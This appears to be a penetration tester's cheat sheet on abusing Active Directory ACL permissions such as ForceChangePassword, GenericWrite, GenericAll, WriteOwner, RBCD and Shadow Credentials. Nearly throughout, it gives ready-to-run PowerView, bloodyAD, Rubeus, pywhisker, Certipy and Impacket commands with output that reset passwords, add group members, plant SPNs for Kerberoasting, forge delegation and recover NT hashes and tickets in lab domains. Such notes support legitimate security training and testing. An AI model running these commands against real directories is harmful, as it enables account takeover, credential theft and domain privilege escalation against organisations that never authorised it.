ACL
Interesting ACL
ForceChangePassword abused with
Set-DomainUserPassword- gives us the right to reset a user's password without first knowing their password (should be used cautiously and typically best to consult our client before resetting passwords).Add Membersabused withAdd-DomainGroupMemberGenericAllabused withSet-DomainUserPasswordorAdd-DomainGroupMember- this grants us full control over a target object. Again, depending on if this is granted over a user or group, we could modify group membership, force change a password, or perform a targeted Kerberoasting attack. If we have this access over a computer object and the Local Administrator Password Solution (LAPS) is in use in the environment, we can read the LAPS password and gain local admin access to the machine which may aid us in lateral movement or privilege escalation in the domain if we can obtain privileged controls or gain some sort of privileged access.GenericWriteabused withSet-DomainObject- gives us the right to write to any non-protected attribute on an object. If we have this access over a user, we could assign them an SPN and perform a Kerberoasting attack (which relies on the target account having a weak password set). Over a group means we could add ourselves or another security principal to a given group. Finally, if we have this access over a computer object, we could perform a resource-based constrained delegation attack which is outside the scope of this module.WriteOwnerabused withSet-DomainObjectOwnerWriteDACLabused withAdd-DomainObjectACLAllExtendedRightsabused withSet-DomainUserPasswordorAdd-DomainGroupMemberAddselfabused withAdd-DomainGroupMember- shows security groups that a user can add themselves to.
Tools
AbuseACL
Script to automatically list vulnerable Windows ACEs/ACLs.
ACLpwn
SharpADWS
C:\Users\Marcus>SharpADWS.exe acl -dn "OU=Domain Controllers,DC=corp,DC=local" -scope Subtree -trustee Marcus
Severity : Critical
ObjectDN : CN=DC01,OU=Domain Controllers,DC=corp,DC=local
AccessControlType : Allow
ActiveDirectoryRights : ListChildren, ReadProperty, GenericWrite
ObjectType : All
Trustee : Marcus
IsInherited : FalseMore commands on the github repo
ADACLScanner
PowerDACL
ACL Enumeration
PowerView
Find-InterstingDomainAcl -ResolveGUIDsPS C:\htb> Import-Module .\PowerView.ps1
PS C:\htb> $sid = Convert-NameToSid wleyPS C:\htb> Get-DomainObjectACL -Identity * | ? {$_.SecurityIdentifier -eq $sid}
ObjectDN : CN=Dana Amundsen,OU=DevOps,OU=IT,OU=HQ-NYC,OU=Employees,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL
ObjectSID : S-1-5-21-3842939050-3880317879-2865463114-1176
ActiveDirectoryRights : ExtendedRight
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : 00299570-246d-11d0-a768-00aa006e0529
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 56
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 256
SecurityIdentifier : S-1-5-21-3842939050-3880317879-2865463114-1181
AceType : AccessAllowedObject
AceFlags : ContainerInherit
IsInherited : False
InheritanceFlags : ContainerInherit
PropagationFlags : None
AuditFlags : NonePS C:\htb> $guid= "00299570-246d-11d0-a768-00aa006e0529"
PS C:\htb> Get-ADObject -SearchBase "CN=Extended-Rights,$((Get-ADRootDSE).ConfigurationNamingContext)" -Filter {ObjectClass -like 'ControlAccessRight'} -Properties * |Select Name,DisplayName,DistinguishedName,rightsGuid| ?{$_.rightsGuid -eq $guid} | fl
Name : User-Force-Change-Password
DisplayName : Reset Password
DistinguishedName : CN=User-Force-Change-Password,CN=Extended-Rights,CN=Configuration,DC=INLANEFREIGHT,DC=LOCAL
rightsGuid : 00299570-246d-11d0-a768-00aa006e0529One in all
PS C:\htb> Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid}
AceQualifier : AccessAllowed
ObjectDN : CN=Dana Amundsen,OU=DevOps,OU=IT,OU=HQ-NYC,OU=Employees,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL
ActiveDirectoryRights : ExtendedRight
ObjectAceType : User-Force-Change-Password
ObjectSID : S-1-5-21-3842939050-3880317879-2865463114-1176
InheritanceFlags : ContainerInherit
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-3842939050-3880317879-2865463114-1181
AccessMask : 256
AuditFlags : None
IsInherited : False
AceFlags : ContainerInherit
InheritedObjectAceType : All
OpaqueLength : 0PS C:\htb> $sid2 = Convert-NameToSid damundsen
PS C:\htb> Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid2} -Verbose
AceType : AccessAllowed
ObjectDN : CN=Help Desk Level 1,OU=Security Groups,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL
ActiveDirectoryRights : ListChildren, ReadProperty, GenericWrite
OpaqueLength : 0
ObjectSID : S-1-5-21-3842939050-3880317879-2865463114-4022
InheritanceFlags : ContainerInherit
BinaryLength : 36
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-3842939050-3880317879-2865463114-1176
AccessMask : 131132
AuditFlags : None
AceFlags : ContainerInherit
AceQualifier : AccessAllowedPS C:\htb> Get-DomainGroup -Identity "Help Desk Level 1" | select memberof
memberof
--------
CN=Information Technology,OU=Security Groups,OU=Corp,DC=INLANEFREIGHT,DC=LOCALPS C:\htb> $itgroupsid = Convert-NameToSid "Information Technology"
PS C:\htb> Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $itgroupsid} -Verbose
AceType : AccessAllowed
ObjectDN : CN=Angela Dunn,OU=Server Admin,OU=IT,OU=HQ-NYC,OU=Employees,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL
ActiveDirectoryRights : GenericAll
OpaqueLength : 0
ObjectSID : S-1-5-21-3842939050-3880317879-2865463114-1164
InheritanceFlags : ContainerInherit
BinaryLength : 36
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-3842939050-3880317879-2865463114-4016
AccessMask : 983551
AuditFlags : None
AceFlags : ContainerInherit
AceQualifier : AccessAllowedPS C:\htb> $adunnsid = Convert-NameToSid adunn
PS C:\htb> Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $adunnsid} -Verbose
AceQualifier : AccessAllowed
ObjectDN : DC=INLANEFREIGHT,DC=LOCAL
ActiveDirectoryRights : ExtendedRight
ObjectAceType : DS-Replication-Get-Changes-In-Filtered-Set
ObjectSID : S-1-5-21-3842939050-3880317879-2865463114
InheritanceFlags : ContainerInherit
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-3842939050-3880317879-2865463114-1164
AccessMask : 256
AuditFlags : None
IsInherited : False
AceFlags : ContainerInherit
InheritedObjectAceType : All
OpaqueLength : 0
AceQualifier : AccessAllowed
ObjectDN : DC=INLANEFREIGHT,DC=LOCAL
ActiveDirectoryRights : ExtendedRight
ObjectAceType : DS-Replication-Get-Changes
ObjectSID : S-1-5-21-3842939050-3880317879-2865463114
InheritanceFlags : ContainerInherit
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-3842939050-3880317879-2865463114-1164
AccessMask : 256
AuditFlags : None
IsInherited : False
AceFlags : ContainerInherit
InheritedObjectAceType : All
OpaqueLength : 0
<SNIP>Get-Acl & GetADUser
PS C:\htb> Get-ADUser -Filter * | Select-Object -ExpandProperty SamAccountName > ad_users.txtPS C:\htb> foreach($line in [System.IO.File]::ReadLines("C:\Users\htb-student\Desktop\ad_users.txt")) {get-acl "AD:\$(Get-ADUser $line)" | Select-Object Path -ExpandProperty Access | Where-Object {$_.IdentityReference -match 'INLANEFREIGHT\\wley'}}
Path : Microsoft.ActiveDirectory.Management.dll\ActiveDirectory:://RootDSE/CN=Dana
Amundsen,OU=DevOps,OU=IT,OU=HQ-NYC,OU=Employees,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL
ActiveDirectoryRights : ExtendedRight
InheritanceType : All
ObjectType : 00299570-246d-11d0-a768-00aa006e0529
InheritedObjectType : 00000000-0000-0000-0000-000000000000
ObjectFlags : ObjectAceTypePresent
AccessControlType : Allow
IdentityReference : INLANEFREIGHT\wley
IsInherited : False
InheritanceFlags : ContainerInherit
PropagationFlags : NoneNXC
nxc ldap 192.168.1.48 -u raj -p Password@1 --kdcHost ignite.local -M daclread -o TARGET=Administrator ACTION=read
Hidden OU ACLs
ForceChangePassword
wley -> ForceChangePassword -> damundsen
Run as wley
PS C:\htb> $SecPassword = ConvertTo-SecureString '<PASSWORD HERE>' -AsPlainText -Force
PS C:\htb> $Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\wley', $SecPassword) New password
PS C:\htb> $damundsenPassword = ConvertTo-SecureString 'Pwn3d_by_ACLs!' -AsPlainText -ForceChange Pass
PS C:\htb> cd C:\Tools\
PS C:\htb> Import-Module .\PowerView.ps1
PS C:\htb> Set-DomainUserPassword -Identity damundsen -AccountPassword $damundsenPassword -Credential $Cred -Verbose
VERBOSE: [Get-PrincipalContext] Using alternate credentials
VERBOSE: [Set-DomainUserPassword] Attempting to set the password for user 'damundsen'
VERBOSE: [Set-DomainUserPassword] Password for user 'damundsen' successfully resetWith BloodyAD
bloodyAD --host $dc -d $domain -u $username -p $password set password $target_username $new_passwordWith RPCclient
$ rpcclient -U support 10.10.10.192
Enter WORKGROUP\support's password:
rpcclient $> setuserinfo2 Audit2020 23 'PleaseSub!'
GenericWrite
The typical techniques to abuse GenericWrite are:
shadowCredentials (windows server 2016 or later)
targetKerberoasting (the password should be weak enough to be cracked)
Resource-Based Constrained Delegation
With sufficient rights (GenericWrite or GenericAll) Kerberos preauth can be forced disabled as well - AS REPRoasting
Add Member - PowerView
Run as damundsen:
PS C:\htb> $SecPassword = ConvertTo-SecureString 'Pwn3d_by_ACLs!' -AsPlainText -Force
PS C:\htb> $Cred2 = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\damundsen', $SecPassword) Add member
PS C:\htb> Add-DomainGroupMember -Identity 'Help Desk Level 1' -Members 'damundsen' -Credential $Cred2 -Verbose
VERBOSE: [Get-PrincipalContext] Using alternate credentials
VERBOSE: [Add-DomainGroupMember] Adding member 'damundsen' to group 'Help Desk Level 1'Confirming user wad added to the group
PS C:\htb> Get-DomainGroupMember -Identity "Help Desk Level 1" | Select MemberName
MemberName
----------
busucher
spergazed
<SNIP>
damundsen
dpayneCleanUp - Remove user from group
PS C:\htb> Remove-DomainGroupMember -Identity "Help Desk Level 1" -Members 'damundsen' -Credential $Cred2 -Verbose
VERBOSE: [Get-PrincipalContext] Using alternate credentials
VERBOSE: [Remove-DomainGroupMember] Removing member 'damundsen' from group 'Help Desk Level 1'
TrueAdd Member - BloodyAD
bloodyAD --host $dc -d $domain -u $username -p $password add groupMember $group_name $member_to_addDisable Kerberos Pre Auth - ASREP Roast
MisconfigurationTargeted Kerberoast
Linux
$ sudo ntpdate dc01.certified.htb | ./targetedKerberoast.py -v -d 'certified.htb' -u 'judith.mader' -p 'judith09' --dc-ip 10.10.11.41Windows
Enumerate the permissions for one group with PowerView
Find-InterstingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"}Check if a the victim already has a SPN
PowerView
Get-DomainUser -Identity victim | select serviceprinicpalnameAD Module
Get-ADUser -Identity victim -Properties ServicePrincipalName | select ServicePrincipalNameSet a SPN for the victim
PowerView
Set-DomainObject -Identity victim -Set @{serviceprincipalname='domain/whatever'}AD Module
Set-ADUser -Identity victim -ServicePrincipalNames @{Add='domain/whatever'}Kerberoast the vicitm
Rubeus.exe kerberoast /outfile:targetedhahses.txt
john.exe --wordlist=C:\path\to\10k-worst-pass.txt C:\path\to\targetedhashes.txtTrustee and Resource Delegation
Windows Server 2008
Traditional methosds (shadow credential, RBCD, targetedKerberoast) can not be used -> change password
net rpc password 'TARGET$' Passw0rd1 -U retro2.vl/'ControlledUser$'%P@ssw0rd -S BLN01.retro2.vl
GenericAll
With sufficient rights (GenericWrite or GenericAll) Kerberos preauth can be forced disabled as well - AS REPRoasting
C:> net group "groupName" targetUser /domain /add
PS C:\htb> Set-DomainObject -Credential $Cred2 -Identity adunn -SET @{serviceprincipalname='notahacker/LEGIT'} -Verbose
VERBOSE: [Get-Domain] Using alternate credentials for Get-Domain
VERBOSE: [Get-Domain] Extracted domain 'INLANEFREIGHT' from -Credential
VERBOSE: [Get-DomainSearcher] search base: LDAP://ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL/DC=INLANEFREIGHT,DC=LOCAL
VERBOSE: [Get-DomainSearcher] Using alternate credentials for LDAP connection
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(&(|(|(samAccountName=adunn)(name=adunn)(displayname=adunn))))
VERBOSE: [Set-DomainObject] Setting 'serviceprincipalname' to 'notahacker/LEGIT' for object 'adunn'PS C:\htb> .\Rubeus.exe kerberoast /user:adunn /nowrapCleanUp - Remove fake SPN
PS C:\htb> Set-DomainObject -Credential $Cred2 -Identity adunn -Clear serviceprincipalname -Verbose
VERBOSE: [Get-Domain] Using alternate credentials for Get-Domain
VERBOSE: [Get-Domain] Extracted domain 'INLANEFREIGHT' from -Credential
VERBOSE: [Get-DomainSearcher] search base: LDAP://ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL/DC=INLANEFREIGHT,DC=LOCAL
VERBOSE: [Get-DomainSearcher] Using alternate credentials for LDAP connection
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(&(|(|(samAccountName=adunn)(name=adunn)(displayname=adunn))))
VERBOSE: [Set-DomainObject] Clearing 'serviceprincipalname' for object 'adunn'Other Example
PS C:\Users\mssqladm\Desktop> Import-Module .\PowerView.ps1
PS C:\Users\mssqladm\Desktop> Get-DomainUser 'ttimmons' | Select serviceprincipalname
serviceprincipalname
--------------------
PS C:\Users\mssqladm\Desktop> Set-DomainObject -Identity 'ttimmons' -Set @{serviceprincipalname='nonexistent/BLAHBLAH'}
PS C:\Users\mssqladm\Desktop> $User = Get-DomainUser 'ttimmons'
PS C:\Users\mssqladm\Desktop> $User | Get-DomainSPNTicket | fl
RBCD - Resource Based Constrained Delegation RBCD
Trustee and Resource DelegationChange user Context
*Evil-WinRM* PS C:\> $TargetComputer = 'TARGET.domain.local'
*Evil-WinRM* PS C:\> $UserWithDaclUsername = 'domain.local\test'
*Evil-WinRM* PS C:\> $UserWithDaclPassword = ConvertTo-SecureString 'Password' -AsPlainText -Force
*Evil-WinRM* PS C:\> $Cred = New-Object System.Management.Automation.PSCredential($UserWithDaclUsername, $UserWithDaclPassword)1 - Add a new attacker-controlled computer account
https://raw.githubusercontent.com/Kevin-Robertson/Powermad/refs/heads/master/Powermad.ps1
*Evil-WinRM* PS C:\> Import-Module .\Powermad.ps1
*Evil-WinRM* PS C:\> New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force) -Verbose -Credential $Cred
Verbose: [+] Domain Controller =
Verbose: [+] Domain = domain.local
Verbose: [+] SAMAccountName = attackersystem$
Verbose: [+] Distinguished Name = CN=attackersystem,CN=Computers,DC=domain,DC=local
[+] Machine account attackersystem added2 - Build a generic ACE with the attacker-added computer SID as the principal, and get the binary bytes for the new DACL/ACE
https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/refs/heads/dev/Recon/PowerView.ps1
*Evil-WinRM* PS C:\> Import-Module .\PowerView.ps1
*Evil-WinRM* PS C:\> $ComputerSid = Get-DomainComputer attackersystem -Properties objectsid -Verbose -Credential $Cred | Select -Expand objectsid
Verbose: [Get-Domain] Using alternate credentials for Get-Domain
Verbose: [Get-Domain] Extracted domain 'domain.local' from -Credential
Verbose: [Get-DomainSearcher] search base: LDAP://dc1.domain.local/DC=domain,DC=local
Verbose: [Get-DomainSearcher] Using alternate credentials for LDAP connection
Verbose: [Get-DomainComputer] Get-DomainComputer filter string: (&(samAccountType=805306369)(|(name=attackersystem)))
*Evil-WinRM* PS C:\> $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
*Evil-WinRM* PS C:\> $SDBytes = New-Object byte[] ($SD.BinaryLength)
*Evil-WinRM* PS C:\> $SD.GetBinaryForm($SDBytes, 0)3 - Set this newly created security descriptor in the msDS-AllowedToActOnBehalfOfOtherIdentity field of the comptuer account
*Evil-WinRM* PS C:\> Get-DomainComputer $TargetComputer -Verbose -Credential $Cred | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose -Credential $CredOr automate the process with RbcdPwn.ps1
PS C:\> Import-Module .\PowerView.ps1
PS C:\> Import-Module .\Powermad.ps1
PS C:\> Import-Module .\RbcdPwn.ps1
PS C:\> Invoke-RbcdPwn -FakeMachine fakemachine1234 - Hash the plaintext password into its RC4_HMAC form
PS C:\> .\Rubeus.exe hash /domain:domain.local /user:fakemachine123$ /password:P@ssw0rd!
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.0.2
[*] Action: Calculate Password Hash(es)
[*] Input password : P@ssw0rd!
[*] Input username : fakemachine123$
[*] Input domain : domain.local
[*] Salt : DOMAIN.LOCALhostfakemachine123.domain.local
[*] rc4_hmac : 217E50203A5ABA59CEFA863C724BF61B
[*] aes128_cts_hmac_sha1 : 9B5A2BAF536BC1D4BABE30F732A8FB39
[*] aes256_cts_hmac_sha1 : EC73111B3BA6754EDAFF699140B8B989771EB671D52B640F622DF58E76181052
[*] des_cbc_md5 : 4FA1ECEFBAC776CD
```5 - Get a service ticket for the service name (sname) we want to "pretend" to be "admin"
PS C:\> .\Rubeus.exe s4u /domain:domain.local /user:fakemachine123$ /rc4:217E50203A5ABA59CEFA863C724BF61B /impersonateuser:user_to_impersonate /msdsspn:http/web.domain.local /pttPS C:\> cmd /c curl --negotiate -u : http://web.domain.local -o out.html -vDisable Kerberos Pre Auth - ASREP Roast
MisconfigurationChange Password
evil-winrm -u "username" -p 'password' -i 10.10.11.42
Evil-WinRM shell v3.5
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\username\Documents> upload PowerView.ps1
Warning: Remember that in docker environment all local paths should be at /data and it must be mapped correctly as a volume on docker run command
Info: Uploading /workspace/PowerView.ps1 to C:\Users\username\Documents\PowerView.ps1
Data: 1027036 bytes of 1027036 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\username\Documents> Import-Module .\PowerView.ps1
*Evil-WinRM* PS C:\Users\username\Documents> $UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
*Evil-WinRM* PS C:\Users\username\Documents> Set-DomainUserPassword -Identity targettedUser -AccountPassword $UserPassword
*Evil-WinRM* PS C:\Users\username\Documents> exit
Info: Exiting with code 0
[Nov 22, 2024 - 03:13:42 (EST)] exegol-Lab /workspace # nxc smb 10.10.11.42 -u 'targettedUser' -p 'Password123!' --sharesWith BloodyAD
bloodyAD --host $dc -d $domain -u $username -p $password set password $target_username $new_passwordOn OU - Generic Descendent Object Takeover
# getTGT.py 'domain.htb/d.anderson:password' -dc-ip 10.10.11.31
# export KRB5CCNAME=d.anderson.ccache
# dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'd.anderson' -target-dn 'OU=MARKETING DIGITAL,DC=DOMAIN,DC=HTB' 'domain.htb/d.anderson' -k -no-pass -dc-ip 10.10.11.31
Impacket for Exegol - v0.10.1.dev1+20240403.124027.3e5f85b - Copyright 2022 Fortra - forked by ThePorgs
[*] NB: objects with adminCount=1 will no inherit ACEs from their parent container/OU
[*] DACL backed up to dacledit-20241204-045901.bak
[*] DACL modified successfully!
```
# bloodyAD --host "dc01.domain.htb" -d "domain.htb" --kerberos --dc-ip 10.10.11.31 -u "d.anderson" -p "password" set password "e.rodriguez" "0xss0rzpass++++"
[+] Password changed successfully!AddSelf
AddSelf, similar to AddMember. While AddMember is WriteProperty access right on the target's Member attribute, AddSelf is a Self access right on the target's Member attribute, allowing the attacker to add itself to the target group, instead of adding arbitrary principals.
# bloodyAD --host "10.10.11.31" -d "domain.htb" -u "e.rodriguez" -p '0xss0rzpass++++' add groupMember "chiefs marketing" "e.rodriguez"
[+] e.rodriguez added to chiefs marketingAllExtendedRights
Change password
bloodyAD --host "192.168.1.8" -d "ignite.local" -u "geet" -p "Password@1" set password "kavish" "Password@987"Shadow Credentials
Pre-requisites to abuse Shadow Credentials:
AD CS (Key Trust if AD CS is not present)
Support for PKINIT and at least one DC with Windows Server 2016 or above.
Permissions (GenericWrite/GenericAll) to modify the
msDS-KeyCredentialLinkattribute of the target object.
In BloodHound: AddKeyCredentialLink
Linux - Pywhisker
pywhisker issue
[!] module 'OpenSSL.crypto' has no attribute 'PKCS12'
troubleshooting:
https://github.com/ShutdownRepo/pywhisker/issues/17
┌──(kali㉿kali)-[~/Desktop/pywhisker]
└─$ rm requirements.txt
┌──(kali㉿kali)-[~/Desktop/pywhisker]
└─$ vim requirements.txt
┌──(kali㉿kali)-[~/Desktop/pywhisker]
└─$ cat requirements.txt
impacket
pyOpenSSL==24.0.0
cryptography
six
pyasn1
ldap3
ldapdomaindump
rich
setuptools
dsinternals
┌──(kali㉿kali)-[~/Desktop/pywhisker]
└─$ pip3 install -r requirements.txt $ pywhisker.py -d "domain.htb" -u "owned" -H aad3b435b51**********5b51404ee:7fc6************b5a85a -td targetdomain.local --target "target" --action "list"
$ pywhisker.py -d "domain.htb" -u "owned" -H aad3b435b51**********5b51404ee:7fc6************b5a85a -td targetdomain.local --target "target" --action "add"
<--SNIP-->
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: QZrd2HfW.pfx
[*] Must be used with password: 7ZoeJDqSZnv5CtHwNY8K
[*] A TGT can now be obtained with
$ gettgtpkinit.py -cert-pfx QZrd2HfW.pfx -pfx-pass 7ZoeJDqSZnv5CtHwNY8K targetdomain.local/target QZrd2HfW.ccache
<--SNIP-->
INFO:minikerberos:AS-REP encryption key (you might need this later):
2024-03-17 05:05:07,420 minikerberos INFO 9b0312752bf1042f8a34616e8e641704c11aa0a08b4c6420e04f9bb32b4a1998
$ export KRB5CCNAME=QZrd2HfW.ccache
$ getnthash.py targetdomain.local/target -key 9b0312752bf1042f8a34616e8e641704c11aa0a08b4c6420e04f9bb32b4a1998 -debug -dc-ip [IP]
<--SNIP-->
Recovered NT Hash
cf3a*************ed5c58 ┌──(kali㉿kali)-[~/Desktop/pywhisker/pywhisker]
└─$ python pywhisker.py -d "domain.htb" -u "controlledUser" -p "password" --target "targetedUser" --action "add" --dc-ip 10.10.11.41
[*] Searching for the target account
[*] Target user found: CN=targetted user,CN=Users,DC=domain,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: cf165020-4ec3-8daf-508f-259e8d1432dd
[*] Updating the msDS-KeyCredentialLink attribute of targettedUser
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: Nroyxf0a.pfx
[*] Must be used with password: k9NDc9ioP2ctBPVjCxVg
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
┌──(kali㉿kali)-[~/Desktop/PKINITtools]
└─$ sudo ntpdate dc01.domain.htb | python gettgtpkinit.py domain.htb/targettedUser -cert-pfx /home/kali/Desktop/pywhisker/pywhisker/Nroyxf0a.pfx -pfx-pass 'k9NDc9ioP2ctBPVjCxVg' targettedUser.ccache
2024-11-26 12:32:49,589 minikerberos INFO Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2024-11-26 12:32:49,617 minikerberos INFO Requesting TGT
INFO:minikerberos:Requesting TGT
2024-11-26 12:32:52,984 minikerberos INFO AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2024-11-26 12:32:52,984 minikerberos INFO e0d4ce3341797354ca80223549a358554596114362dd3d532450cbc7709cf852
INFO:minikerberos:e0d4ce3341797354ca80223549a358554596114362dd3d532450cbc7709cf852
2024-11-26 12:32:52,988 minikerberos INFO Saved TGT to file
INFO:minikerberos:Saved TGT to file
┌──(kali㉿kali)-[~/Desktop/PKINITtools]
└─$ sudo ntpdate dc01.domain.htb | python getnthash.py domain.htb/targettedUser -key e0d4ce3341797354ca80223549a358554596114362dd3d532450cbc7709cf852
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Using TGT from cache
[*] Requesting ticket to self with PAC
Recovered NT Hash
a091c1832bcdd4677c28b5a6a1295584Certipy
shadow auto
[Mar 11, 2024 - 08:59:19 (CET)] exegol-Zephyr /workspace # proxychains -q certipy shadow auto -u "owned@domain.local" -p 'password' -account 'target_account' -dns-tcp -dc-ip [IP]
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Targeting user 'target_account'
<--SNIP-->
[*] Successfully restored the old Key Credentials for 'ZPH-SVRMGMT1$'
[*] NT hash for 'target_account': 89d0*************ef2fAbusing User Object
Enumerate the permissions.
Find-InterestingDomainAcl-ResolveGUIDs|?{$_.IdentityReferenceName -match"StudentUsers"}Add the Shadow Credential.
Whisker.exe add /target:supportXuserLinux - pyWhisker - cf The Hacker Recipes
Using PowerView, see if the Shadow Credential is added.
Get-DomainUser -Identity supportXuserRequest the TGT by leveraging the certificate.
Rubeus.exe asktgt /user:supportXuser /certificate:MIIJuAIBA<-SNIP-> /password:"1O<-SNIP->" /domain:domain.local /dc:DC.domain.local /getcredentials /show /nowrapInject the TGT in the current session or use the NTLM hash
Rubeus.exe ptt/ticket:<base64_tgt>Abusing Computer Object
Enumerate the permissions.
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match'mgmtadmin’}Add the Shadow Credentials.
SafetyKatz.exe"sekurlsa::pth /user:mgmtadmin /domain:domain.local /aes256:<aes_key> /run:cmd.exe" "exit"Whisker.exe add /target:computer$Using PowerView, see if the Shadow Credential is added.
Get-DomainComputer -Identity computerRequest the TGT by leveraging the certificate.
Rubeus.exe asktgt /user:computer$ /certificate:MIIJ0AIBA<-SNIP-> /password:"ViG<-SNIP->" /domain:domain.local /dc:DC.domain.local /getcredentials /showRequest and Inject the TGS by impersonating the user.
Rubeus.exe s4u /dc:dc.domain.local /ticket:<base64_tgt> /impersonateuser:administrator /ptt /self /altservice:cifs/computerShadowSpray
WriteOwner
GitHub - CravateRouge/bloodyAD: BloodyAD is an Active Directory Privilege Escalation FrameworkGitHubGrant Ownership
bloodyAD --host $dc -d $domain -u $username -p $password set owner $target_group $target_username./bloodyAD.py --host "10.10.11.41" -d "DC01.domain.local" -u "controlledUser" -p "password" set owner "CN=Management,CN=Users,DC=domain,DC=local" "CN=Controlled User,CN=Users,DC=domain,DC=local"Grant yourself the AddMember privilege
dacledit.py -action 'write' -rights 'WriteMembers' -principal 'controlledUser' -target-dn 'CN=Management,CN=Users,DC=domain,DC=local' -dc-ip '10.10.11.41' 'domain.local'/'controlledUser':'password'Add member
./bloodyAD.py --host "10.10.11.41" -d "domain.local" -u "controlledUser" -p "password" add groupMember "CN=Management,CN=Users,DC=domain,DC=local" "CN=controlled User,CN=Users,DC=domain,DC=local"Resource
Last updated